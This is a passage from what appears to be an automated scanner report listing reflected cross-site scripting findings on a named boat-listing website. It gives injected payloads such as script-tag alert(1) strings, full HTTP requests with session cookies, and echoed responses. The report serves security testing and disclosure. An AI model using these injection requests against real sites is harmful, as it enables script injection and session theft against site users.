savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:29 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Pursuit262f0"><a>29d9123605e/A-1">
...[SNIP]...

3.264. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Pursuit/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d76"><script>alert(1)</script>f06c1c35f6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Pursuit/181d76"><script>alert(1)</script>f06c1c35f6 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.265. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Regal/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9196e"><a>07485257775 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type9196e"><a>07485257775/Regal/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:47 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type9196e"><a>07485257775/Regal/1">
...[SNIP]...

3.266. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Regal/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8412"><a>1c31124826f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Regale8412"><a>1c31124826f/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.267. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Regal/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd253"><script>alert(1)</script>d186c810a1f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Regal/1dd253"><script>alert(1)</script>d186c810a1f HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:08 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Regal/1dd253"><script>alert(1)</script>d186c810a1f/A-1">
...[SNIP]...

3.268. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Regulator

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559a7"><a>1435df8bb9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type559a7"><a>1435df8bb9e/Regulator HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+